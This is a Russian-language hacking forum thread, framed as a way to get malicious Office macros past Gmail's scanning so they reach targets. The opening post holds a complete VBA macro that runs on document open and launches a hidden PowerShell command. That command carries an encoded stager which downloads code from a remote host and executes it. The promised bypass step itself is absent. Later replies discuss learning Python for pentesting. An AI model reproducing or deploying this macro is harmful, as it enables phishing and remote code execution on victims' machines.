Обход проверки вредоносных макросов сервисами gmail

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 21 ноя 2016.

  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    19 окт 2016
    Сообщения:
    485
    Симпатии:
    1.620
    Привет колеги. Вы уж извините , но это статья будет короткая но со смыслом)))
    Как большинство из вас знает,почта gmail всячески не дает нам отсылать вредоносные макросы нашим так сказать клиентам)
    И вот некоторыми хорошими людьми было замечено что службы gmail парсят в макросах документа определенные слова,в случае обнаружение таких будет уведомления о том что в документе обнаружен вирус , и в лучшем случае письмо просто попадет в спам,а обычно даже отослать не дают.
    Обход проверки вредоносных макросов сервисами gmail
    Обходится это очень и очень просто)

    Если у нас код макроса следующего вида:

    Код (Text):
    Sub AutoOpen()
        Debugging
    End Sub

    Sub Document_Open()
        Debugging
    End Sub

    Public Function Debugging() As Variant
        Dim Str As String
        str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
        str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
        str = str + "8ASQBOAHQATQBhAE4AQQBnAEUAUgBdADoAOgBFAFgAcABFAEMA"
        str = str + "VAAxADAAMABDAG8ATgB0AGkAbgBVAEUAIAA9ACAAMAA7ACQAVw"
        str = str + "BjAD0ATgBlAFcALQBPAEIAagBlAEMAVAAgAFMAeQBzAFQARQBt"
        str = str + "AC4ATgBlAFQALgBXAGUAYgBDAEwASQBFAE4AVAA7ACQAdQA9AC"
        str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A"
        str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA"
        str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw"
        str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAE"
        str = str + "gAZQBhAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA"
        str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAWQ"
        str = str + "AgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAFQALgBXAEUAYgBS"
        str = str + "AEUAcQB1AGUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAHQAVwBFAG"
        str = str + "IAUABSAG8AeAB5ADsAJABXAGMALgBQAFIAbwBYAHkALgBDAFIA"
        str = str + "ZQBkAGUATgB0AEkAQQBMAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQ"
        str = str + "AuAE4ARQBUAC4AQwBSAGUAZABlAE4AdABJAGEAbABDAEEAQwBI"
        str = str + "AEUAXQA6ADoARABFAEYAYQBVAEwAdABOAGUAdAB3AE8AUgBLAE"
        str = str + "MAUgBlAGQAZQBuAHQASQBBAEwAUwA7ACQASwA9ACcAeQAzAGAA"
        str = str + "QQAuAGQAZgBsAFMAYgBNAFcAKwB6AEcAdwBWADkAQgBeADAAPQ"
        str = str + "BcADQAYwAkAHIAWwBnACUAUQBOACcAOwAkAGkAPQAwADsAWwBj"
        str = str + "AGgAYQByAFsAXQBdACQAQgA9ACgAWwBjAEgAQQBSAFsAXQBdAC"
        str = str + "gAJAB3AGMALgBEAG8AVwBOAEwATwBBAGQAUwBUAHIASQBuAGcA"
        str = str + "KAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMw"
        str = str + "A3AC4AMQAzADcAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBz"
        str = str + "AHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwByACQASwBbAC"
        str = str + "QAaQArACsAJQAkAGsALgBMAGUAbgBnAHQASABdAH0AOwBJAEUA"
        str = str + "WAAgACgAJABiAC0ASgBPAEkAbgAnACcAKQA="
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create str, Null, objConfig, intProcessID
    End Function
     
    Обход проверки вредоносных макросов сервисами gmail

    То для обхождения фильтра нам нужно просто :


    Cпасибо за внимание)
     
    ghost, ☠xrahitel☠, Apton и 5 другим нравится это.
  2. Ishikawa

    Ishikawa マエストロ
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    15 ноя 2016
    Сообщения:
    124
    Симпатии:
    163
    Старый трюк :)
     
  3. ghostphisher

    ghostphisher гарант codeby
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    7 дек 2016
    Сообщения:
    1.605
    Симпатии:
    1.488
    Получилось? Опишите более детально как помог данный пост опробовать описанное.
     
  4. (((_CYBORG_)))

    Репутация:
    0
    Регистрация:
    18 апр 2017
    Сообщения:
    12
    Симпатии:
    4

    Привет друг! я В этом деле начинающий! Я еще не пробовал данный метотод но попробую. для начало хочу обратно кали поставить на ноут но проблема с гибридной видео картой. страдаю на виндовсе...... не люблю я его на линуксе проще намного мне работать. щас вот решился учиться программрованию но незнаю с какого языка мне проще будет. чтоб скажем так он был мне полезен. для тех же писания экслойтов. Так же чтоб можно было читать и понимать исходный код. желание и терпение есть а вот с какой тропы начать и куда идти да так что не ошибиться ......... запутался я мне бы в помощь опытного человека. А направление мое меня больше интересует пен тестинг. linux и все что с ним связано. Планы грандиозные )))) Соображалка работает. Но вот нужно в правельное русло как то все связать. .......:)
     
  5. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    69
    Симпатии:
    20
    Для того чтоб писайть эксплойты сойдет и обычный блокнот,а во язык программирования можно взять python.Пентест вообще не зависти от какой либо ОС,что нравиться то и используй.Пентест вообще штука забавная, в нем нужно знать все,и учиться надо все время,так как каждый день появляются новые виды угроз.Самое главное больше читать и искать новые решения самому,ну и посещать или смотреть разного рода конфиренции.
     
    (((_CYBORG_))) нравится это.
  6. (((_CYBORG_)))

    Репутация:
    0
    Регистрация:
    18 апр 2017
    Сообщения:
    12
    Симпатии:
    4
    Как начинающему программисту лучше с питона начачть? я думал лучше с Си
     
  7. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    69
    Симпатии:
    20
    Тут мы как бы от темы уходим....
    С/С++ для начало это слишком,а вот python самое оно,после можно и на си переходить.
     
    (((_CYBORG_))) нравится это.
  8. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    69
    Симпатии:
    20
    Не за что
     
    (((_CYBORG_))) нравится это.
Загрузка...
Похожие Темы - Обход проверки вредоносных
  1. Brib
    Ответов:
    3
    Просмотров:
    203
  2. Brib
    Ответов:
    15
    Просмотров:
    1.448
  3. Vander
    Ответов:
    1
    Просмотров:
    731
  4. PingVinich
    Ответов:
    4
    Просмотров:
    920
  5. PingVinich
    Ответов:
    9
    Просмотров:
    1.408

Поделиться этой страницей